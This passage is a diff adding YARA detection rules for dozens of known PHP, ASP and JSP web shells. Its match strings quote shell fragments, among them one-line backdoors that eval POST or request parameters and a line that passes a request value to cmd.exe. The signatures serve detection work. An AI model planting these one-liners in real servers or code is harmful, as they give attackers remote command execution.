+rule Webshell_PHP_redcod_RID2E5E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file redcod.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:11:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
+      $s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_remview_fix_RID2F4B : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file remview_fix.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:51:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u" 
+      $s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_php_sh_server_RID301E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file server.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:26:11"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "eval(getenv('HTTP_CODE'));" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_PH_Vayv_PH_Vayv_RID303F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file PH Vayv.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:31:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in" 
+      $s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_caidao_shell_ice_RID310E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file ice.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:06:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%eval request(\"ice\")%>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_cihshell_fix_RID2F98 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cihshell_fix.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:03:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty" 
+      $s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_asp_shell_RID2E61 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file shell.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:12:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
+      $s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_Private_i3lue_RID2FC2 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Private-i3lue.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:10:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "case 15: $image .= \"\\21\\0\\" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Mysql_interface_v1_0_RID3261 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Mysql interface v1.0.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:02:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return" 
+   condition: 
+      all of them
+}
+
+rule Webshell_php_s_u_RID2D94 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file s-u.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:37:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea" 
+   condition: 
+      all of them
+}
+
+rule Webshell_phpshell_2_1_config_RID31FC : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file config.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:45:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_EFSO_2_RID2E07 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file EFSO_2.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:57:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_up_RID2D37 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file up.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:22:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_NetworkFileManagerPHP_A_RID3353 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file NetworkFileManagerPHP.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:43:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted " 
+   condition: 
+      all of them
+}
+
+rule Webshell_Server_Variables_RID3115 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Server Variables.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:07:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
+      $s9 = "Variable Name</B></font></p>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_caidao_shell_ice_2_RID319F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file ice.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:30:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_caidao_shell_mdb_RID3110 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file mdb.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:06:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<% execute request(\"ice\")%>a " fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_guige_RID2E63 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file guige.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:12:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null" 
+   condition: 
+      all of them
+}
+
+rule Webshell_phpspy2010_RID2E0D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file phpspy2010.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:58:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "eval(gzinflate(base64_decode(" 
+      $s5 = "//angel" fullword
+      $s8 = "$admin['cookiedomain'] = '';" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_ice_RID2D7A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file ice.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:33:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC" 
+   condition: 
+      all of them
+}
+
+rule Webshell_drag_system_RID2F48 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file system.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:50:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_" 
+   condition: 
+      all of them
+}
+
+rule Webshell_DarkBlade1_3_asp_indexx_RID3355 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file indexx.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:43:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_hsxa_RID2E06 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file hsxa.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:56:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_utils_RID2E83 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file utils.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:17:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
+      $s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z" 
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_01_RID2CAA : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 01.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 09:58:51"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%eval request(\"pass\")%>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_404_RID2CE1 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 404.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:08:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2" 
+   condition: 
+      all of them
+}
+
+rule Webshell_webshell_cnseay02_1_RID31D0 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file webshell-cnseay02-1.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:38:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU" 
+   condition: 
+      all of them
+}
+
+rule Webshell_php_fbi_RID2D7E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file fbi.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:34:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo" 
+   condition: 
+      all of them
+}
+
+rule Webshell_cmd_asp_5_1_RID2EA1 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmd-asp-5.1.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:22:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_php_dodo_zip_RID2FA5 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file zip.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:06:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x" 
+      $s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" 
+   condition: 
+      all of them
+}
+
+rule Webshell_aZRaiLPhp_v1_0_RID2F86 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file aZRaiLPhp v1.0.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:00:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($" 
+      $s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo" 
+   condition: 
+      all of them
+}
+
+rule Webshell_php_list_RID2E09 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file list.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:57:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "// list.php = Directory & File Listing" fullword
+      $s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena" 
+      $s9 = "// by: The Dark Raver" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_ironshell_RID2E76 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file ironshell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:15:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"" 
+      $s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di" 
+   condition: 
+      all of them
+}
+
+rule Webshell_caidao_shell_404_RID3075 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 404.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:40:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St" 
+   condition: 
+      all of them
+}
+
+rule Webshell_ASP_aspydrv_RID2EF2 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file aspydrv.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:36:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_web_RID2D90 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file web.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:37:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request." 
+   condition: 
+      all of them
+}
+
+rule Webshell_mysqlwebsh_RID2EF5 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file mysqlwebsh.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:36:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jspShell_1_RID2E7B : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file jspShell.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:16:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on" 
+      $s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Dx_Dx_RID2C7D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file Dx.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 09:51:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx" 
+      $s9 = "class=linelisting><nobr>POST (php eval)</td><" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_asp_ntdaddy_RID2F31 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file ntdaddy.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:46:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "if  FP  =  \"RefreshFolder\"  or  " 
+      $s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  " 
+   condition: 
+      1 of them
+}
+
+rule Webshell_MySQL_Web_Interface_Version_0_8_RID3634 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file MySQL Web Interface Version 0.8.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 16:45:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>" 
+   condition: 
+      all of them
+}
+
+rule Webshell_elmaliseker_2_RID2FC5 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file elmaliseker.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:11:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx" 
+      $s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but" 
+   condition: 
+      all of them
+}
+
+rule Webshell_ASP_RemExp_RID2E3A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file RemExp.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:05:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques" 
+      $s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_list1_RID2E3F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file list1.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:06:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive" 
+      $s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\"" 
+   condition: 
+      all of them
+}
+
+rule Webshell_asp_1_RID2C7A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file 1.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 09:50:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "!22222222222222222222222222222222222222222222222222" fullword
+      $s8 = "<%eval request(\"pass\")%>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_cmd_win32_RID2DEC : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file cmd_win32.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:52:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam" 
+      $s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_jsp_jshell_RID2ED4 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file jshell.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:31:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "kXpeW[\"" fullword
+      $s4 = "[7b:g0W@W<" fullword
+      $s5 = "b:gHr,g<" fullword
+      $s8 = "RhV0W@W<" fullword
+      $s9 = "S_MR(u7b" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_ASP_zehir4_RID2E3F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file zehir4.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:06:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
